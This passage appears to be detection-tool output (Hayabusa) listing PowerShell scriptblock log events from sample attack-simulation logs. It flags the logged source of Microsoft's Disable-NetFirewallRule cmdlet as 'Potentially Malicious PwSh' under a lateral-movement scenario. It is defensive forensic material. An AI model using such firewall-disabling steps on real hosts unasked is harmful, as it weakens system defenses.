@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias 